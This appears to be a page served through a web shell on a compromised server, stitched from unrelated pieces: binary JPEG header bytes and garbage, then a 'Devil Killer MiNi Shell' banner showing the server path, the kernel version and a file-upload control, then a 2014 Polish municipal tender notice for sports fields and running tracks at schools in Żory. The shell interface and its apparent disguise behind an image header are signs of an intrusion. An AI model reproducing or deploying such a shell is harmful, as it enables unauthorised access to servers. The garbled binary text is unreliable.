JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140606/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140606/122861-N-2014.html

<p class="kh_header"><b>Żory: Wykonanie nowej nawierzchni poliuretanowej boiska wielofunkcyjnego przy Szkole Podstawowej nr 17, budowa bieżni i skoczni w dal przy Zespole Szkolno Przedszkolnym nr 9 oraz budowa boiska wielofunkcyjnego przy Gimnazjum Nr 2 w Żorach</b><br>
<b>Numer ogłoszenia: 122861 - 2014; data zamieszczenia: 06.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska  Żory , Al. Wojska Polskiego 25, 44-240 Żory, woj. śląskie, tel. 32 4348245, faks 32 4348248.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie nowej nawierzchni poliuretanowej boiska wielofunkcyjnego przy Szkole Podstawowej nr 17, budowa bieżni i skoczni w dal przy Zespole Szkolno Przedszkolnym nr 9 oraz budowa boiska wielofunkcyjnego przy Gimnazjum Nr 2 w Żorach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie nowej nawierzchni poliuretanowej boiska wielofunkcyjnego przy Szkole Podstawowej nr 17, budowa bieżni i skoczni w dal przy Zespole Szkolno Przedszkolnym nr 9 oraz budowa boiska wielofunkcyjnego przy Gimnazjum Nr 2 w Żorach.

Zamówienie zostało podzielone na 3 części:
Cześć 1 Budowa bieżni lekkoatletycznej wraz z zeskokiem przy Zespole Szkolno-Przedszkolnym Nr 9 w Żorach.
Część 2 Wykonanie nowej nawierzchni poliuretanowej boiska wielofunkcyjnego przy Szkole Podstawowej Nr 17 w Żorach.
Część 3  Budowa boiska wielofunkcyjnego przy Gimnazjum Nr 2 w Żorach.

Przeprowadzający Postępowanie  dopuszcza możliwość składania ofert częściowych

Szczegółowy opis przedmiotu zamówienia zawierają:
a)mapy sytuacyjne wraz z rysunkami szczegółowymi ( dla części 1 i 2)
b)dokumentacja projektowa ( dla części 3)
c)specyfikacje techniczna wykonania i odbioru robót,
d)przedmiary robót. 

Przedmiotem zamówienia jest: 
Część 1 Budowa bieżni lekkoatletycznej wraz z zeskokiem przy Zespole Szkolno-Przedszkolnym Nr 9 w Żorach.
Budowa bieżni lekkoatletycznej o powierzchni całkowitej 168,00m2:
a)Korytowanie pod bieżnię i zeskok na głębokość ok. 35cm,
b)Wywóz wraz z utylizacją materiałów z korytowania,
c)Wykonanie odcinka drenażu  80 mm z obsypką żwirową w geowłókninie - 80mb,
d)Wykonanie podbudowy przepuszczalnej dla wody pod bieżnię lekkoatletyczną:
-grunt rodzimy,
-warstwa odsączająca z piasku lub pospółki o gr. 10cm,
-warstwa konstrukcyjna z kruszywa kamiennego (fr. 32-63mm) o gr. 10cm,
-warstwa klinująca z kruszywa kamiennego (fr. 0-32mm) o gr. 8cm,
-warstwa wyrównująca z miału kamiennego (fr. 0-4mm) o gr. 4cm,
e)Ułożenie wokół bieżni obrzeży betonowych 8x30cm na ławie betonowej z oporem,
f)Wykonanie nawierzchni poliuretanowej bieżni typu natrysk (kolor ceglasty)
wraz z malowaniem linii (trzy tory) specjalistyczną farbą poliuretanową w kolorze białym - 168,00m2,
g)Wykonanie zeskoku (piaskownica) dla skoku w dal wraz belką do odbicia umieszczoną w bieżni, piaskownica o wymiarach 4,0x8,0m wykonana z elementów 
z tworzywa sztucznego odpornych na warunki atmosferyczne, piaskownica wypełniona drobnym piaskiem płukanym.
Roboty należy wykonać zgodnie ze szczegółowymi specyfikacjami technicznymi (SST).

Część 2 Wykonanie nowej nawierzchni poliuretanowej boiska wielofunkcyjnego przy Szkole Podstawowej Nr 17 w Żorach.
Nowa nawierzchnia boiska wielofunkcyjnego o wymiarach 19,1 m x 32,1 m (pole gry 15,1m x 28,1m) o powierzchni całkowitej 613,11 m2:
a)Rozbiórka istniejącej nawierzchni poliuretanowej boiska wielofunkcyjnego,
b)Wywóz wraz z utylizacją materiałów z rozbiórki,
c)Wykonanie odcinka drenażu  80 mm z obsypką żwirową w geowłókninie - 20mb,
d)Wyrównanie istniejącej podbudowy boiska wielofunkcyjnego wraz wykonaniem nowej warstwy wyrównującej z miału kamiennego (fr. 0-4mm) o gr. 4cm,
e)Wykonanie nawierzchni poliuretanowej boiska typu natrysk - 613,11m2,
f)Malowanie linii boisk specjalistyczną farbą poliuretanową - boisko do koszykówki 
i siatkówki. 
Roboty należy wykonać zgodnie ze szczegółowymi specyfikacjami technicznymi (SST).

Część 3 Budowa boiska wielofunkcyjnego przy Gimnazjum Nr 2 w Żorach. Budowa boiska wielofunkcyjnego o powierzchni całkowitej 1210,71m2:
a)boisko do piłki ręcznej o wymiarach 44,00m x 24,00m (pole gry 40,00m x 20,00m),
b)boisko do koszykówki o wymiarach 32,10m x 19,10m (pole gry 28,10m x 15,10m),
c)boisko do siatkówki - pole gry 18,00m x 9,00m,
d)parametry techniczne boiska wielofunkcyjnego:
-podbudowa przepuszczalna
-nawierzchnia boiska - poliuretanowa w technologii typu NATRYSK
-wokół boiska obrzeża betonowe 8x30cm na ławie betonowej z oporem oddzielające sąsiednie elementy terenu od płyty boiska
-za bramkami boiska do piłki ręcznej zamontowane w sposób trwały z podłożem piłkochwyty wysokości 6m z siatki polipropylenowej
-odwodnienie boiska - drenaż podłączony do istniejącej kanalizacji deszczowej,
e)w trakcie robót związanych z podłączeniem drenażu boiska do istniejącej studni kanalizacji deszczowej uwzględnić konieczność przekładki nawierzchni istniejącego placu z trylinki na podsypce cementowo-piaskowej (powierzchnia około 45,0m2),
f)w przypadku uszkodzenia w trakcie robót budowlanych związanych z budową boiska wielofunkcyjnego istniejącej nawierzchni bieżni lekkoatletycznej z mączki ceglanej, zlokalizowanej w bezpośrednim sąsiedztwie boiska, należy uwzględnić koniczność naprawy i odtworzenia przedmiotowej nawierzchni bieżni.
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji projektowej.
Roboty należy wykonać zgodnie z dokumentacją projektową i SST.
DOKUMENTY DOTYCZĄCE OFEROWANEJ NAWIERZCHNI POLIURETANOWEJ 
1.Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008 , lub 
aprobata techniczna ITB, lub  rekomendacja techniczna ITB, lub wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, ISA-Sport, Sports Labs Ltd lub dokument równoważny.
2.Karta techniczna oferowanej nawierzchni potwierdzona przez jej producenta.
3.Atest PZH lub dokument równoważny dla oferowanej nawierzchni.
4.Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem 60 miesięcznej gwarancji udzielonej przez producenta na tą nawierzchnię.

Wyżej wymienione wymagane dokumenty należy dostarczyć Zamawiającym przed podpisaniem umowy - dotyczy Wykonawcy robót wybranego w drodze przetargu.

Informacje dodatkowe:
1.Po ułożeniu nowej nawierzchni poliuretanowej boiska wielofunkcyjnego lub bieżni Zamawiający zastrzegają sobie prawo zlecenia niezależnej instytucji wykonania badań laboratoryjnych nawierzchni oraz opracowanie ekspertyzy poprawności wykonania nawierzchni poliuretanowej. 
2.Wykonawca odpowiada za ochronę środowiska na placu budowy i w jego otoczeniu, podejmuje odpowiednie środki w celu zabezpieczenia dróg prowadzących do placu budowy przed zniszczeniem i zanieczyszczeniem spowodowanym jego środkami transportowymi. Po zakończeniu robót przywraca je do stanu pierwotnego. 
3.Stosowane materiały powinny posiadać atesty oraz deklaracje zgodności - materiały potrzebne dla celów  realizacji przedmiotowego zamówienia są w gestii Wykonawcy.
4.Masy ziemne, gruz i odpady powstałe w trakcie robót przekazać odbiorcy odpadu posiadającemu zezwolenie na prowadzenie przetwarzania odpadów zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 roku (Dz. U. z 2013r. poz. 21) lub wykorzystać we własnym zakresie zgodnie z posiadanym zezwoleniem na prowadzenie przetwarzania odpadów. Przekazanie odpadów należy udokumentować pisemnie.
5.Materiał z frezowania nawierzchni asfaltowych istniejących boisk sportowych przewieźć i złożyć za pokwitowaniem do Zakładów Techniki Komunalne w Żorach.
6.Pozyskany z rozbiórki złom po potwierdzeniu ilości przez inspektora nadzoru i w jego obecności przekazać do skupu. 
7.Dla poszczególnych części (za wyjątkiem części 2 - Boisko przy SP-17) wykonać inwentaryzację geodezyjną powykonawczą z naniesieniem na miejskie zasoby geodezyjne przez uprawnionego geodetę w 3 egz. - przedłożyć na dzień odbioru  
lub przedstawić poświadczenie z MPZG o złożeniu materiałów z prac inwentaryzacyjnych. Dla części 1 wykonać inwentaryzację bieżni wraz z zeskokiem 
z uwzględnieniem ogrodzenia terenu szkoły od strony bieżni.   

2) Przedstawione w dokumentacji przetargowej wskazania na urządzenia techniczne/  materiały/znak towarowy z podaniem producenta oraz wskazania na normy o których mowa w art. 30 ust. 1-3 ustawy pzp, należy traktować jako przykładowe, ze względu na zasady ustawy pzp, a zwłaszcza art. 29 i 30. Oznacza to, że Wykonawcy mogą zaproponować inne niż wyszczególnione w dokumentacji rozwiązania z zachowaniem odpowiednich, równoważnych parametrów technicznych dla osiągnięcia oczekiwanej funkcjonalności całego układu, będącego przedmiotem zamówienia.
Wykonawca jest zobowiązany wykazać jakie materiały i urządzenia zostały zmienione i określić jakie materiały i urządzenia w ich miejsce proponuje. 
Ponadto winien wykazać w sposób nie budzący wątpliwości, że wskazane rozwiązania są równoważne..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.21.22.21-1, 45.11.12.00-0, 45.11.10.00-8, 45.23.61.10-4, 45.23.21.30-2, 45.23.24.10-9, 45.23.32.50-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Część 1 - 1.000,00zł (słownie: tysiąc złotych 0/00).
Część 2 -  1.500,00 zł (słownie: tysiąc pięćset złotych 0/00).
Część 3 -  5.000 zł ( słownie: pięć tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przeprowadzający powstępowanie nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przeprowadzający postępowanie uzna warunek określony  w punkcie 5.2)  za spełniony, jeśli Wykonawca wykonał roboty budowlane w zakresie niezbędnym do wykazania spełniania warunku wiedzy  i doświadczenia w  okresie  ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, tj. co najmniej: 
a) jedną robotę budowlaną obejmującą wykonanie nawierzchni poliuretanowej o powierzchni nie mniejszej niż 100 m2 w przypadku ubiegania się o realizację części 1,
b) jedną robotę budowlaną obejmującą wykonanie nawierzchni poliuretanowej o powierzchni nie mniejszej niż 400 m2 w przypadku ubiegania się o realizację części 2,
c) jedną robotę budowlaną obejmującą wykonanie nawierzchni poliuretanowej o powierzchni nie mniejszej niż 800 m2 w przypadku ubiegania się o realizację części 3,
oraz  załączy dowody dotyczące najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

W przypadku gdy Wykonawca składa ofertę na część 1 i 2 zobowiązany jest wykazać się spełnieniem warunku określonego w punkcie 5A ppkt 2 b. 
W przypadku gdy Wykonawca składa ofertę na część 2 i 3 albo 1 i 3 albo 1,2 i 3 zobowiązany jest wykazać się spełnieniem warunku określonego w punkcie 5A ppkt 2 c.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przeprowadzający powstępowanie nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przeprowadzający postępowanie uzna warunek za spełniony, jeśli Wykonawca wskaże osobę, która będzie uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialną za:  kierowanie robotami budowlanymi w specjalności konstrukcyjno-budowlanej lub drogowej (uprawnienia w zakresie kierowania, nadzorowania i kontrolowania budowy) wraz z informacjami na temat jej kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nią czynności, oraz informacją o podstawie do dysponowania tą osobą w przypadku ubiegania się o udzielenie zamówienia na realizację jednej lub więcej części jednocześnie.

W przypadku osób posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się aby osoby te spełniały odpowiednie warunki opisane w art. 12a ustawy Prawo budowlane. Przeprowadzający powstępowanie uzna uprawnienia zdobyte na podstawie przepisów obowiązujących przed dniem wejścia w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy - w oparciu o art. 104 ustawy z dnia 7 lipca 1994r. - Prawo budowlane (Dz. U. z 2003r. Nr 207, poz. 2016 ze zmianami).

Wykonawca oświadczy, że osoba, która będzie uczestniczyć w wykonywaniu zamówienia posiada wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przeprowadzający powstępowanie nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia lub inny dokument potwierdzający ten fakt - jeżeli Wykonawca polega na zasobach innych  podmiotów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1 przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy
Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:
I. Przyczyna/okoliczności    
Konieczność zmiany dokumentacji projektowej wynikła w trakcie realizacji inwestycji 
Skutek - zmiana w umowie/aneks
Zmiana terminu realizacji zamówienia o  tyle dni, ile trwało przeprojektowanie, dostawa materiałów i realizacja wynikłe ze zmian projektowych
II. Przyczyna/okoliczności    
Zmiana producenta materiałów /urządzeń, wycofania materiałów /urządzeń z użycia
Skutek - zmiana w umowie/aneks
Zmiana terminu wykonania zamówienia o czas potrzebny na zakup nowych materiałów/urządzeń
III. Przyczyna/okoliczności                                         
Wystąpienie zdarzeń losowych - klęska żywiołowa
Skutek - zmiana w umowie/aneks
Zmiana terminu wykonania zadania o tyle dni, ile trwało wstrzymanie robót
IV. Przyczyna/okoliczności                                         
Zmiana przepisów o podatku od towarów i usług
Skutek - zmiana w umowie/aneks
zmniejszenie/zwiększenie wynagrodzenia brutto wykonawcy; kwota zostanie zmieniona zgodnie ze zmianą stawki VAT
V. Przyczyna/okoliczności                                         
Przekształcenie firmy, zmiana nazwy firmy
Skutek - zmiana w umowie/aneks
Spisanie aneksu do umowy uwzględniającego dokonanie przekształcenia firmy
VI. Przyczyna/okoliczności                                         
Zmiana lub rezygnacja z podwykonawcy będącego podmiotem na zasobach którego opierał się wykonawca w celu spełnienia warunków udziału w postępowaniu na zasadach art. 26 ust. 2b
Skutek - zmiana w umowie/aneks
Wprowadzenie (Podwykonawca lub Wykonawca) innego podmiotu który potwierdza spełnienie warunków w stopniu nie mniejszym niż wymagany w SIWZ
VII. Przyczyna/okoliczności                                         
Długotrwałe, tj. powyżej 5 dni kalendarzowych, warunki atmosferyczne uniemożliwiające prowadzenie robót  zapisane w dzienniku budowy
Skutek - zmiana w umowie/aneks
Przedłużenie terminu realizacji umowy o tyle dni, ile trwały warunki atmosferyczne uniemożliwiające prowadzenie robót
VIII. Przyczyna/okoliczności                                         
Potrzeba wprowadzenia lub zmiany zakresu robót wykonywanych przez podwykonawcę z przyczyn niezależnych od Wykonawcy
Skutek - zmiana w umowie/aneks
Spisania aneksu do umowy określającego zakres robót wykonywanych przez podwykonawcę
IX. Przyczyna/okoliczności                                         
Znalezienie niewybuchów
Skutek - zmiana w umowie/aneks
Przesunięcie terminu wykonania zadania o taki czas, ile trwało wstrzymanie robót związane z usunięciem niewybuchów
X. Przyczyna/okoliczności                                         
Wstrzymanie prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę
Skutek - zmiana w umowie/aneks
Spisanie aneksu do umowy wydłużającego termin wykonania robót o tyle dni ile trwało wstrzymanie robót.
XI. Przyczyna/okoliczności                                         
Zlecenie wykonania badań laboratoryjnych nawierzchni i opracowanie ekspertyzy poprawności wykonania nawierzchni poliuretanowej.
Skutek - zmiana w umowie/aneks
Przesunięcie terminu wykonania zadania o tyle dni, ile trwało uzyskanie wyników badań i ekspertyzy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zory.pl  menu przedmiotowe: Przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żory, Aleja Wojska Polskiego 25, 44-240 Żory, pokój 203, II piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2014 godzina 12:00, miejsce: Urząd Miasta Żory Al. W.P. 25 44-240 Żory pok. INFORMACJA-parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





